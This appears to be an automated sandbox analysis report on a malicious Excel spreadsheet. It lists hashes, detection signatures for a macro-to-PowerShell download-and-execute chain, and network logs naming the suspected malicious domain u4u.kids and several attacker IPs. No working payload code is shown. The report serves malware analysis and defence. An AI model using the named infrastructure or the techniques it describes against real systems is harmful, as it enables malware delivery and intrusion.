Windows Analysis Report
A & C Metrology OC 5457144.xls

Overview

General Information

Sample name: A & C Metrology OC 5457144.xls
Analysis ID: 1540833
MD5: 48c40411ba277f1c9829871605366dc0
SHA1: 8e2a93e0bd4e23b655de720b5d75f1e01420c17e
SHA256: 86e985895fb6d155d4d6c894c8d038b76f5e6db694ca0c59867ee43867d49f61
Tags: xlsuser-abuse_ch
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection

barindex
Source: A & C Metrology OC 5457144.xls ReversingLabs: Detection: 18%
Source: A & C Metrology OC 5457144.xls Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdb source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdbhP source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdbhP source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdb source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic DNS query: name: u4u.kids
Source: global traffic DNS query: name: u4u.kids
Source: global traffic DNS query: name: u4u.kids
Source: global traffic DNS query: name: drive.google.com
Source: global traffic DNS query: name: drive.usercontent.google.com
Source: global traffic DNS query: name: drive.google.com
Source: global traffic DNS query: name: drive.usercontent.google.com
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
